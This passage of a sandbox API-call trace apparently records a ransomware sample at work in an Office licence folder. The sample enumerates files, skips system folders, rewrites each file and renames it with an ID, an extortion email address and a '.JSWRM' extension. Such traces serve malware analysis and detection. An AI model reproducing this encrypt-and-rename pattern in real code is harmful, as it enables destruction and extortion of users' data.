HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0102.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0102.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0102.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0102.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0102.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.832] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11576) returned 1 [0102.832] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0102.832] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0102.834] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.834] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0102.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.834] CloseHandle (hObject=0x45c) returned 1 [0102.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0102.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0102.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0102.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0102.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0102.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.835] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0102.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0102.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0102.836] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3bb0ba1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3bb0ba1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3c494f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelVL_MAK-ul-phn.xrm-ms", cAlternateFileName="EX3B3E~1.XRM")) returned 1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.836] lstrcmpiW (lpString1="ExcelVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ul-phn.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0102.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ul-phn.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ul-phn.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0102.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ul-phn.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2412b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0102.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0102.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0102.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.837] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19921) returned 1 [0102.837] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0102.837] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.840] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.840] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.840] CloseHandle (hObject=0x45c) returned 1 [0102.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0102.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0102.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0102.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.841] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0102.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0102.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0102.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0102.842] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3c9598b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3c9598b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3d7a82a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bd3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="HOB5CE~1.XRM")) returned 1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.842] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned -1 [0102.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0102.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0102.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0102.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0102.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0102.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0102.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0102.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0102.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0102.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.843] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11219) returned 1 [0102.843] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bd0) returned 0x24c1d0 [0102.843] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bd0, lpOverlapped=0x0) returned 1 [0102.845] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.845] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bd0, lpOverlapped=0x0) returned 1 [0102.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.845] CloseHandle (hObject=0x45c) returned 1 [0102.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0102.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0102.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0102.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0102.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0102.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0102.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.846] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessdemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0102.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0102.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0102.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.848] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3cbbc0c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3cbbc0c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3da0a82, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x56d0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="HO90F4~1.XRM")) returned 1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.848] lstrcmpiW (lpString1="HomeBusinessDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.848] lstrcmpiW 